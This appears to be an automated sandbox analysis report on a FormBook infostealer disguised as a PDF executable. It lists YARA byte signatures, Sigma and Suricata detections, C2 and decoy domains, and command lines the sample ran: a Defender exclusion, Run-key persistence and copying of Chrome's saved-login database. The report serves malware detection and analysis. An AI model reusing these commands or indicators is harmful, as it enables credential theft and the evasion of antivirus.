0.2.101 2043 5770 pdf.exe.29d3ba0caf0.1.raw.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x5cdaf1:$a1: 3C 30 50 4F 53 54 74 09 40 0x62a381:$a1: 3C 30 50 4F 53 54 74 09 40 0x753e51:$a1: 3C 30 50 4F 53 54 74 09 40 0x5e4440:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x640cd0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x76a7a0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x5d226f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x62eaff:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x7585cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x5dd157:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83 0x6399e7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83 0x7634b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
0.2.101 2043 5770 pdf.exe.29d3ba0caf0.1.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x5d11a8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x5d1422:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x62da38:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x62dcb2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x757508:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x757782:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x5dcf55:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x6397e5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x7632b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x5dca41:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x6392d1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x762da1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x5dd057:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x6398e7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x7633b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x5dd1cf:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x639a5f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x76352f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x5d1e3a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x62e6ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x75819a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
0.2.101 2043 5770 pdf.exe.29d3ba0caf0.1.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x5e00b9:$sqlite3step: 68 34 1C 7B E1 0x5e01cc:$sqlite3step: 68 34 1C 7B E1 0x63c949:$sqlite3step: 68 34 1C 7B E1 0x63ca5c:$sqlite3step: 68 34 1C 7B E1 0x766419:$sqlite3step: 68 34 1C 7B E1 0x76652c:$sqlite3step: 68 34 1C 7B E1 0x5e00e8:$sqlite3text: 68 38 2A 90 C5 0x5e020d:$sqlite3text: 68 38 2A 90 C5 0x63c978:$sqlite3text: 68 38 2A 90 C5 0x63ca9d:$sqlite3text: 68 38 2A 90 C5 0x766448:$sqlite3text: 68 38 2A 90 C5 0x76656d:$sqlite3text: 68 38 2A 90 C5 0x5e00fb:$sqlite3blob: 68 53 D8 7F 8C 0x5e0223:$sqlite3blob: 68 53 D8 7F 8C 0x63c98b:$sqlite3blob: 68 53 D8 7F 8C 0x63cab3:$sqlite3blob: 68 53 D8 7F 8C 0x76645b:$sqlite3blob: 68 53 D8 7F 8C 0x766583:$sqlite3blob: 68 53 D8 7F 8C
13.2.101 2043 5770 pdf.exe.2654460caf0.1.raw.unpack	JoeSecurity_FormBook	Yara detected FormBook	Joe Security
13.2.101 2043 5770 pdf.exe.2654460caf0.1.raw.unpack	JoeSecurity_FormBook_1	Yara detected FormBook	Joe Security
13.2.101 2043 5770 pdf.exe.2654460caf0.1.raw.unpack	Windows_Trojan_Diceloader_15eeb7b9	unknown	unknown	0x5e6b59:$a1: E9 92 9D FF FF C3 E8 0x6433e9:$a1: E9 92 9D FF FF C3 E8 0x74ce81:$a1: E9 92 9D FF FF C3 E8
13.2.101 2043 5770 pdf.exe.2654460caf0.1.raw.unpack	Windows_Trojan_Formbook_1112e116	unknown	unknown	0x5cdaf1:$a1: 3C 30 50 4F 53 54 74 09 40 0x62a381:$a1: 3C 30 50 4F 53 54 74 09 40 0x733e19:$a1: 3C 30 50 4F 53 54 74 09 40 0x5e4440:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x640cd0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x74a768:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55 0x5d226f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x62eaff:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x738597:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01 0x5dd157:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83 0x6399e7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83 0x74347f:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
13.2.101 2043 5770 pdf.exe.2654460caf0.1.raw.unpack	Formbook_1	autogenerated rule brought to you by yara-signator	Felix Bilstein - yara-signator at cocacoding dot com	0x5d11a8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x5d1422:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x62da38:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x62dcb2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x7374d0:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x73774a:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC 0x5dcf55:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x6397e5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x74327d:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94 0x5dca41:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x6392d1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x742d69:$sequence_2: 3B 4F 14 73 95 85 C9 74 91 0x5dd057:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x6398e7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x74337f:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F 0x5dd1cf:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x639a5f:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x7434f7:$sequence_4: 5D C3 8D 50 7C 80 FA 07 0x5d1e3a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x62e6ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06 0x738162:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
13.2.101 2043 5770 pdf.exe.2654460caf0.1.raw.unpack	Formbook	detect Formbook in memory	JPCERT/CC Incident Response Group	0x5e00b9:$sqlite3step: 68 34 1C 7B E1 0x5e01cc:$sqlite3step: 68 34 1C 7B E1 0x63c949:$sqlite3step: 68 34 1C 7B E1 0x63ca5c:$sqlite3step: 68 34 1C 7B E1 0x7463e1:$sqlite3step: 68 34 1C 7B E1 0x7464f4:$sqlite3step: 68 34 1C 7B E1 0x5e00e8:$sqlite3text: 68 38 2A 90 C5 0x5e020d:$sqlite3text: 68 38 2A 90 C5 0x63c978:$sqlite3text: 68 38 2A 90 C5 0x63ca9d:$sqlite3text: 68 38 2A 90 C5 0x746410:$sqlite3text: 68 38 2A 90 C5 0x746535:$sqlite3text: 68 38 2A 90 C5 0x5e00fb:$sqlite3blob: 68 53 D8 7F 8C 0x5e0223:$sqlite3blob: 68 53 D8 7F 8C 0x63c98b:$sqlite3blob: 68 53 D8 7F 8C 0x63cab3:$sqlite3blob: 68 53 D8 7F 8C 0x746423:$sqlite3blob: 68 53 D8 7F 8C 0x74654b:$sqlite3blob: 68 53 D8 7F 8C
Click to see the 67 entries

Sigma Signatures

System Summary

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile, CommandLine: "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\101 2043 5770 pdf.exe", ParentImage: C:\Users\user\Desktop\101 2043 5770 pdf.exe, ParentProcessId: 2720, ParentProcessName: 101 2043 5770 pdf.exe, ProcessCommandLine: "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile, ProcessId: 1292, ProcessName: powershell.exe

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\101 2043 5770 pdf.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\101 2043 5770 pdf.exe, ProcessId: 2720, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\101 2043 5770 pdf

Sigma detected: Potential Browser Data Stealing

Source: Process started

Author: Nasreddine Bencherchali (Nextron Systems): Data: Command: /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V, CommandLine: /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Windows\SysWOW64\ipconfig.exe", ParentImage: C:\Windows\SysWOW64\ipconfig.exe, ParentProcessId: 6968, ParentProcessName: ipconfig.exe, ProcessCommandLine: /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V, ProcessId: 5824, ProcessName: cmd.exe

Sigma detected: Powershell Defender Exclusion

Source: Process started

Sigma detected: Uncommon Svchost Parent Process

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\svchost.exe", CommandLine: "C:\Windows\System32\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: "C:\Users\user\101 2043 5770 pdf.exe" , ParentImage: C:\Users\user\101 2043 5770 pdf.exe, ParentProcessId: 6512, ParentProcessName: 101 2043 5770 pdf.exe, ProcessCommandLine: "C:\Windows\System32\svchost.exe", ProcessId: 6272, ProcessName: svchost.exe

Sigma detected: Non Interactive PowerShell Process Spawned

Source: Process started

Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile, CommandLine: "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile, CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\101 2043 5770 pdf.exe", ParentImage: C:\Users\user\Desktop\101 2043 5770 pdf.exe, ParentProcessId: 2720, ParentProcessName: 101 2043 5770 pdf.exe, ProcessCommandLine: "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath $env:UserProfile, ProcessId: 1292, ProcessName: powershell.exe

Sigma detected: Windows Processes Suspicious Parent Directory

Source: Process started

Author: vburov: Data: Command: "C:\Windows\System32\svchost.exe", CommandLine: "C:\Windows\System32\svchost.exe", CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: "C:\Users\user\101 2043 5770 pdf.exe" , ParentImage: C:\Users\user\101 2043 5770 pdf.exe, ParentProcessId: 6512, ParentProcessName: 101 2043 5770 pdf.exe, ProcessCommandLine: "C:\Windows\System32\svchost.exe", ProcessId: 6272, ProcessName: svchost.exe

Stealing of Sensitive Information

Sigma detected: Steal Google chrome login data

Source: Process started

Author: Joe Security: Data: Command: /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V, CommandLine: /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V, CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Windows\SysWOW64\ipconfig.exe", ParentImage: C:\Windows\SysWOW64\ipconfig.exe, ParentProcessId: 6968, ParentProcessName: ipconfig.exe, ProcessCommandLine: /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V, ProcessId: 5824, ProcessName: cmd.exe

Suricata Signatures

ET MALWARE FormBook CnC Checkin (GET) - Source IP: 192.168.2.6 - Destination IP: 204.11.56.48

Timestamp:	2024-08-30T07:27:45.059347+0200
SID:	2031412
Severity:	1
Source Port:	49725
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE FormBook CnC Checkin (GET) - Source IP: 192.168.2.6 - Destination IP: 204.11.56.48

Timestamp:	2024-08-30T07:27:45.059347+0200
SID:	2031449
Severity:	1
Source Port:	49725
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE FormBook CnC Checkin (GET) - Source IP: 192.168.2.6 - Destination IP: 204.11.56.48

Timestamp:	2024-08-30T07:27:45.059347+0200
SID:	2031453
Severity:	1
Source Port:	49725
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE FormBook CnC Checkin (POST) - Source IP: 192.168.2.6 - Destination IP: 204.11.56.48

Timestamp:	2024-08-30T07:27:45.116755+0200
SID:	2829004
Severity:	1
Source Port:	49726
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ETPRO MALWARE FormBook CnC Checkin (POST) - Source IP: 192.168.2.6 - Destination IP: 3.33.130.190

Timestamp:	2024-08-30T07:29:46.364729+0200
SID:	2829004
Severity:	1
Source Port:	49730
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE FormBook CnC Checkin (GET) - Source IP: 192.168.2.6 - Destination IP: 3.33.130.190

Timestamp:	2024-08-30T07:25:54.036660+0200
SID:	2031412
Severity:	1
Source Port:	49729
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE FormBook CnC Checkin (GET) - Source IP: 192.168.2.6 - Destination IP: 3.33.130.190

Timestamp:	2024-08-30T07:25:54.036660+0200
SID:	2031449
Severity:	1
Source Port:	49729
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

ET MALWARE FormBook CnC Checkin (GET) - Source IP: 192.168.2.6 - Destination IP: 3.33.130.190

Timestamp:	2024-08-30T07:25:54.036660+0200
SID:	2031453
Severity:	1
Source Port:	49729
Destination Port:	80
Protocol:	TCP
Classtype:	Malware Command and Control Activity Detected

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: www.a2zglobalimports.com/kmge/	Avira URL Cloud: Label: malware
Source: http://www.hhe-crv220.com/kmge/www.sacksmantenimiento.store	Avira URL Cloud: Label: malware
Source: http://www.cq0jt.sbs	Avira URL Cloud: Label: malware
Source: http://www.kickssoccercamp.com	Avira URL Cloud: Label: malware
Source: http://www.hhe-crv220.com/kmge/	Avira URL Cloud: Label: malware
Source: http://www.agritamaperkasaindonesia.com	Avira URL Cloud: Label: malware
Source: http://www.icvp5o.xyz	Avira URL Cloud: Label: malware
Source: http://www.sacksmantenimiento.store/kmge/	Avira URL Cloud: Label: malware
Source: http://www.bedbillionaire.com/kmge/www.mrawkward.xyz	Avira URL Cloud: Label: malware
Source: http://www.a2zglobalimports.com/kmge/www.shearwaterpembrokeshire.com	Avira URL Cloud: Label: malware
Source: http://www.sacksmantenimiento.store/kmge/www.a2zglobalimports.com	Avira URL Cloud: Label: malware
Source: http://www.cq0jt.sbs/kmge/www.hhe-crv220.com	Avira URL Cloud: Label: malware
Source: http://www.hhe-crv220.com	Avira URL Cloud: Label: malware
Source: http://www.sacksmantenimiento.store	Avira URL Cloud: Label: malware
Source: http://www.gsolartech.com/kmge/	Avira URL Cloud: Label: malware
Source: http://www.kickssoccercamp.com/kmge/	Avira URL Cloud: Label: malware
Source: http://www.bedbillionaire.com/kmge/	Avira URL Cloud: Label: malware
Source: http://www.icvp5o.xyz/kmge/	Avira URL Cloud: Label: malware
Source: http://www.bedbillionaire.com	Avira URL Cloud: Label: malware
Source: http://www.a2zglobalimports.com	Avira URL Cloud: Label: malware
Source: http://www.icvp5o.xyz/kmge/www.bedbillionaire.com	Avira URL Cloud: Label: malware
Source: http://www.kickssoccercamp.com/kmge/www.cq0jt.sbs	Avira URL Cloud: Label: malware
Source: http://www.a2zglobalimports.com/kmge/	Avira URL Cloud: Label: malware

Found malware configuration

Source: 00000009.00000002.4585507094.00000000031D0000.00000040.10000000.00040000.00000000.sdmp

Malware Configuration Extractor: FormBook {"C2 list": ["www.a2zglobalimports.com/kmge/"], "decoy": ["jia0752d.com", "cq0jt.sbs", "whimsicalweddingrentals.com", "meetsex-here.life", "hhe-crv220.com", "bedbillionaire.com", "soycmo.com", "mrawkward.xyz", "11ramshornroad.com", "motoyonaturals.com", "thischicloves.com", "gacorbet.pro", "ihsanid.com", "pancaketurner.com", "santanarstore.com", "cr3dtv.com", "negotools.com", "landfillequip.com", "sejasuapropriachefe.com", "diamant-verkopen.store", "builtonmybrother.art", "teoti.beauty", "kickssoccercamp.com", "chickfrau.com", "compare-energy.com", "icvp5o.xyz", "susan-writes.com", "dropletcoin.com", "sivertool.com", "sup-25987659.com", "weedz-seeds.today", "agritamaperkasaindonesia.com", "safwankhalil.com", "jm2s8a3mz.com", "wfjwjm.com", "be-heatpumps.life", "hcwoodpanel.com", "n5l780.com", "mandalah.art", "szexvideokingyen.sbs", "justinroemmick.com", "thecoolkidsdontfitin.com", "gsolartech.com", "swisswearables.com", "chicagocarpetcleaneril.com", "terrazahills-cbre.com", "santatainha.com", "sacksmantenimiento.store", "wzhem.rest", "shearwaterpembrokeshire.com", "baansantiburi.com", "mid-size-suv-87652.com", "solunchina.com", "nandos.moe", "blucretebistro.com", "identificatiekvk.digital", "8772876.com", "longfangyun.com", "litblacklit.com", "mobilferrari.com", "zeeedajewelermusic.com", "allenbach.swiss", "industrialrevolution.ink", "cmgamingtrack.com"]}

Multi AV Scanner detection for domain / URL

Source: www.mrawkward.xyz	Virustotal: Detection: 8%	Perma Link
Source: www.hhe-crv220.com	Virustotal: Detection: 7%	Perma Link
Source: www.icvp5o.xyz	Virustotal: Detection: 9%	Perma Link
Source: www.kickssoccercamp.com	Virustotal: Detection: 6%	Perma Link
Source: www.sacksmantenimiento.store	Virustotal: Detection: 8%	Perma Link
Source: www.cq0jt.sbs	Virustotal: Detection: 10%	Perma Link
Source: www.n5l780.com	Virustotal: Detection: 5%	Perma Link
Source: www.bedbillionaire.com	Virustotal: Detection: 9%	Perma Link
Source: http://www.mrawkward.xyz	Virustotal: Detection: 8%	Perma Link
Source: www.a2zglobalimports.com/kmge/	Virustotal: Detection: 9%	Perma Link
Source: http://www.cq0jt.sbs	Virustotal: Detection: 10%	Perma Link
Source: http://www.kickssoccercamp.com	Virustotal: Detection: 6%	Perma Link
Source: http://www.mrawkward.xyz/kmge/	Virustotal: Detection: 9%	Perma Link
Source: http://www.hhe-crv220.com/kmge/	Virustotal: Detection: 9%	Perma Link
Source: http://www.n5l780.com/kmge/www.szexvideokingyen.sbs	Virustotal: Detection: 6%	Perma Link
Source: http://www.n5l780.com/kmge/	Virustotal: Detection: 9%	Perma Link
Source: http://www.sejasuapropriachefe.com/kmge/	Virustotal: Detection: 6%	Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\user\101 2043 5770 pdf.exe

ReversingLabs: Detection: 31%

Multi AV Scanner detection for submitted file

Source: 101 2043 5770 pdf.exe	ReversingLabs: Detection: 31%
Source: 101 2043 5770 pdf.exe	Virustotal: Detection: 16%			Perma Link

Yara detected FormBook

Source: Yara match	File source: 6.2.csc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.calc.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.calc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.wmplayer.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.csc.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 31.2.wmplayer.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.101 2043 5770 pdf.exe.26544819588.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.101 2043 5770 pdf.exe.29d3bc19588.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.101 2043 5770 pdf.exe.29d3ba0caf0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.101 2043 5770 pdf.exe.2654460caf0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.4585507094.00000000031D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.2474640577.0000000003130000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.4592604318.0000000003540000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.2475520882.00000000039E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.4577458882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2188500657.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.2312391293.0000000000C00000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2188907996.0000000005800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.4579441533.0000000000C40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.2346157181.000001EC02230000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2188866421.00000000057D0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000014.00000002.4578246605.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001F.00000002.2474372915.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000022.00000002.2477860458.0000000002CC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2123708358.0000029D3B800000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2290187771.0000026544400000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Source: 101 2043 5770 pdf.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Source:	Binary string: ipconfig.pdb source: csc.exe, 00000006.00000002.2188747951.00000000054D8000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000006.00000002.2188945268.0000000005830000.00000040.10000000.00040000.00000000.sdmp, ipconfig.exe, ipconfig.exe, 00000009.00000002.4584574115.0000000000DE0000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: firefox.pdbP source: ipconfig.exe, 00000009.00000003.2378244414.0000000006919000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000009.00000003.2325363297.0000000006869000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: ipconfig.pdbGCTL source: csc.exe, 00000006.00000002.2188747951.00000000054D8000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000006.00000002.2188945268.0000000005830000.00000040.10000000.00040000.00000000.sdmp, ipconfig.exe, 00000009.00000002.4584574115.0000000000DE0000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: cmmon32.pdb source: cmmon32.exe, 00000018.00000002.2315834877.0000000000C90000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: cmmon32.pdbGCTL source: cmmon32.exe, 00000018.00000002.2315834877.0000000000C90000.00000040.80000000.00040000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: csc.exe, 00000006.00000003.2122937679.00000000055DD000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000006.00000003.2125210972.000000000578A000.00000004.00000020.00020000.00000000.sdmp, csc.exe, 00000006.00000002.2189080452.0000000005930000.00000040.00001000.00020000.00000000.sdmp, csc.exe, 00000006.00000002.2189080452.0000000005ACE000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000009.00000002.4592690985.0000000003590000.00000040.00001000.00020000.00000000.sdmp, ipconfig.exe, 00000009.00000003.2188668887.000000000322F000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000009.00000003.2190345927.00000000033DD000.00000004.00000020.00020000.00000000.sdmp, ipconfig.exe, 00000009.00000002.4592690985.000000000372E000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000018.00000003.2307893156.000000000493D000.00000004.00000020.00020000.00000000.sdmp, cmmon32.exe, 00000018.00000002.2316929449.0000000004C8E000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000018.00000002.2316929449.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, cmmon32.exe, 00000018.00000003.2305627379.000000000478D000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 0000001F.00000002.2474950752.000000000382E000.00000040.00001000.00020000.00000000.sdmp, wmplayer.exe, 0000001F.00000003.2336815849.000000000333B000.00000004.00000020.00020000.00000000.sdmp, wmplayer.exe, 0000001F.00000002.2474950752.0000000003690000.00000040.00001000.00020000.00000000.sdmp, wmplayer.exe, 0000001F.00000003.2339364958.00000000034E3000.00000004.00000020.00020000.00000000.sdmp, raserver.exe, 00000022.00000002.2478270514.0000000004C30000.00000040.00001000.00020000.00000000.sdmp, raserver.exe, 00000022.00000002.2478270514.0000000004DCE000.00000040.00001000.00020000.00000000.sdmp, raserver.exe, 00000022.00000003.2474713451.00000000048D4000.00000004.00000020.00020000.00000000.sdmp, raserver.exe, 00000022.00000003.2476433854.0000000004A85000.00000004.00000020.00020000.00000000.sdmp
